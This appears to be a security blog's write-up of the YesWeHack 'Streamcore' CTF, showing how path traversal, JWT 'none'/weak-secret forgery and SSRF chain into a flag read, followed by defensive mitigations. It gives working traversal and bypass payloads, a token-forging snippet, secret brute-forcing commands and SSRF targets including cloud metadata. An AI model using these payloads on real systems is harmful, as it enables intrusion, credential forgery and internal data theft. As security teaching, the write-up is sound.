StreamCore CTF Unlocked: How Chaining Path Traversal, JWT Algorithm Confusion, and SSRF Turns a Video Player into a Total System Compromise + Video

Listen to this Post

Featured Image

Introduction:

The YesWeHack Dojo’s latest Capture The Flag (CTF) challenge, “Streamcore,” simulates a sleek video streaming service with a deceptively simple interface. Beneath the surface, however, lies a sophisticated attack chain that forces ethical hackers to weaponize three distinct vulnerability classes—Path Traversal, JWT Algorithm Confusion, and Server-Side Request Forgery (SSRF)—in a single, coordinated exploit. This article dissects the technical path to compromise, providing a hands-on guide to identifying and exploiting these weaknesses while teaching essential defensive strategies for modern web applications.

Learning Objectives:

  • Objective 1: Understand and exploit Path Traversal vulnerabilities in file-loading functionalities to read sensitive source code.
  • Objective 2: Analyze and forge JSON Web Tokens (JWTs) by exploiting weak signing algorithms (e.g., none) or brute-forcing weak HMAC secrets.
  • Objective 3: Master Server-Side Request Forgery (SSRF) attacks to pivot from a video stream processor to internal network services and exfiltrate the flag.

You Should Know:

  1. Mapping the Attack Surface: From Video Player to Local File Disclosure

The CTF presents a video streaming service that loads media files using a parameter in the URL, such as `https://streamcore.ctf/load?file=video.mp4`. The first critical step is testing for a Path Traversal vulnerability, which allows an attacker to read arbitrary files from the server’s filesystem. If the application does not properly sanitize the `file` parameter, an attacker can use sequences like `../` (dot-dot-slash) to move up directories and access sensitive files, such as the application’s source code or configuration files.

Step‑by‑Step Exploitation Guide:

  1. Identify the File-Loading Endpoint: Intercept the request when loading a video using a proxy like Burp Suite or OWASP ZAP. Look for parameters named file, path, document, load, or stream.
  2. Inject Path Traversal Payloads: Send crafted payloads to the endpoint to read the application’s source code, typically app.js, index.php, or server.py.
 Linux/macOS Payload
curl -k "https://streamcore.ctf/load?file=../../../../app.py"

Windows Payload (if server is Windows-based)
curl -k "https://streamcore.ctf/load?file=..\..\..\..\Windows\win.ini"
  1. Bypass Common Defenses: If simple traversal is blocked, try:

– URL Encoding: `%2e%2e%2f` for `../`
– Double URL Encoding: `%252e%252e%252f`
– Absolute Paths: `file:///etc/passwd`
– Null Byte Injection (legacy): `../../../etc/passwd%00.jpg`
4. Analyze the Leaked Source Code: After successfully reading a file like `server.py` or auth.js, search for hardcoded credentials, API keys, or—most critically—the token generation logic. This often reveals how the application creates and validates JWTs. In the Streamcore CTF, this initial traversal exposes the token generation mechanism, showing that the server uses a weak, guessable secret for its JWTs.

  1. Breaking the Bearer: JWT Algorithm Confusion and Secret Brute-Forcing

Once the source code is obtained, the next phase involves manipulating the JSON Web Token (JWT) used for authentication or authorization. A common misconfiguration is accepting the `none` algorithm or using a weak HMAC secret.

Step‑by‑Step JWT Exploitation Guide:

  1. Extract and Decode the JWT: Locate the token from the `Authorization` header or a cookie. Use `jwt_tool` or the online debugger (jwt.io) to decode its payload.
 Using jwt_tool to decode and analyze a token
python3 jwt_tool.py <JWT_TOKEN>
  1. Check for the `none` Algorithm Vulnerability: Tamper with the token’s header, changing the `alg` field to `none` and removing the signature part. This tricks the server into accepting the modified token.
 Python snippet to create a 'none' algorithm token
import jwt
token = jwt.encode({"user":"admin", "role":"admin"}, key='', algorithm='none')
print(token)
  1. Brute-Force a Weak HMAC Secret: If the algorithm is HS256, use a tool like `hashcat` or `john` to crack the secret from a valid token-signature pair.
 Using jwt_tool to brute-force the secret with a wordlist
python3 jwt_tool.py <JWT_TOKEN> -C -d /usr/share/wordlists/rockyou.txt
  1. Forge an Administrative Token: Once you have the secret or confirm the `none` vulnerability, craft a new token with elevated privileges (e.g., changing the role to admin). Send this forged token in a new request to access an internal administrative endpoint, such as /admin/debug, disclosed in the leaked source code.

  2. Pivoting with SSRF: Streaming Your Way to Internal Endpoints

With an admin JWT, the CTF reveals a new function: a `stream_debug` endpoint that allows the user to provide a URL for the server to fetch and process. This is a classic Server-Side Request Forgery (SSRF) vulnerability. The goal is to abuse this privileged service to interact with internal infrastructure.

Step‑by‑Step SSRF Exploitation Guide:

  1. Locate the SSRF Primitives: After authentication with the forged token, navigate to functions like “Import from URL,” “Fetch Metadata,” or any feature that instructs the server to download a resource from a user-supplied address.
  2. Probe the Internal Network: Start by having the server fetch a URL you control to confirm connectivity (e.g., your `https://your-server.com/callback`). Then, scan for internal IP addresses and ports.
Common internal addresses to test for SSRF:
http://127.0.0.1:80
http://127.0.0.1:8080
http://169.254.169.254/latest/meta-data/  Cloud metadata
http://192.168.1.1/config
  1. Bypass Allowlist Restrictions: If the server uses a basic allowlist, bypass it using techniques like:

– Redirects: Host a server that redirects to `http://127.0.0.1/admin`.
– DNS Rebinding: Point a domain to a public IP, then switch to an internal IP.
– Alternative Representations: Use `http://0.0.0.0` or http://localhost` instead of127.0.0.1. Also tryhttp://2130706433/` (decimal for 127.0.0.1).
4. Read the Flag: The internal service the CTF protects is likely a simple HTTP server on `localhost:8080` that requires a specific `X-Internal-API-Key` header. The forged JWT might have already granted you that key. Use the SSRF to request the flag endpoint.

POST /stream_debug HTTP/1.1
Host: streamcore.ctf
Authorization: Bearer <FORGED_ADMIN_TOKEN>
Content-Type: application/json

{"url": "http://127.0.0.1:8080/admin/flag"}

By successfully chaining the path traversal, JWT attack, and SSRF, the flag is exfiltrated via the server’s own request to itself, completely bypassing external access controls.

4. Hardening Against the Chain: Defensive Strategies

Understanding the attack chain is the first step; building resilient defenses is the ultimate goal. Here are key mitigations for each stage:

  • Path Traversal Prevention:
  • Use a secure, allowlist-based approach for file access. Never trust user-supplied input for file paths.
  • Store files outside the web root and reference them by a database ID or a randomly generated filename, not the original path.
  • Implement strict input validation and sanitization, rejecting any characters like ../, ..\, or encoded variants.

  • JWT Hardening:

  • Never accept the `none` algorithm in production. Explicitly configure your JWT library to reject it.
  • Use strong, randomly generated secrets for HMAC signatures (HS256). Consider using asymmetric algorithms like RS256 or ES256, where the private key never leaves the server.
  • Implement short-lived tokens and use refresh tokens to reduce the window of opportunity for an attacker.
  • Validate the `iss` (issuer) and `aud` (audience) claims to prevent token misuse across different services.

  • SSRF Mitigation:

  • Implement a strict allowlist of allowed URLs or IP addresses for any outbound requests initiated by user input.
  • Use a dedicated HTTP client that prevents redirects to internal IPs.
  • Run internal services on non-standard ports and require mutual TLS (mTLS) authentication for service-to-service communication.
  • Isolate the component that makes outbound requests in a restricted network segment with no access to sensitive internal resources.

5. Essential Tools for the Ethical Hacker’s Arsenal

To effectively discover and exploit such chains, a well-equipped toolkit is essential. Here are some recommended tools and their primary use cases:

  • Burp Suite / OWASP ZAP: Intercepting proxies for traffic analysis, parameter manipulation, and automated scanning.
  • jwt_tool: A comprehensive toolkit for testing, analyzing, and forging JWTs.
  • hashcat / John the Ripper: Password cracking tools essential for brute-forcing weak JWT secrets.
  • Nuclei: A fast, template-based vulnerability scanner ideal for automating the detection of known vulnerabilities, including misconfigurations in JWT and SSRF.
  • ffuf / gobuster: Fuzzing tools for discovering hidden endpoints, directories, and parameters.

What Undercode Say:

  • Key Takeaway 1: Modern CTF chains are not about single, isolated bugs but about the creative interconnection of multiple small misconfigurations, each acting as a link in a larger kill chain.
  • Key Takeaway 2: Defenders must adopt an “assume breach” mentality and implement defense-in-depth; a path traversal bug should not lead to a JWT secret, and an SSRF primitive should never be placed in an admin-only function without rigorous allowlisting and network segmentation.

Analysis: This CTF brilliantly mirrors real-world attack paths observed in complex web applications. The progression from information disclosure (path traversal) to privilege escalation (JWT manipulation) to internal network pivoting (SSRF) is a textbook example of how seemingly low-severity issues accumulate into a critical compromise. The ultimate lesson is that each layer of security must be independent. Using a weak JWT secret nullifies authentication, and exposing internal debugging functions behind a compromised token nullifies network isolation. This demonstrates a core principle: isolation and secrets are only as strong as the weakest link in their implementation chain.

Prediction:

  • -1 As AI-assisted coding becomes mainstream, the prevalence of hardcoded secrets and weak algorithm support in JWT libraries may temporarily increase, as developers rely on auto-complete without security context, leading to a resurgence of these specific vulnerability chains.
  • +1 The growing maturity of automated API security testing tools (e.g., Burp Suite’s BChecks, custom Nuclei templates) will soon make the detection of complex, multi-stage chains like “Path Traversal -> JWT Weakness -> SSRF” a standard CI/CD gate, drastically reducing their presence in production environments.

▶️ Related Video (66% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Our Dojo – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky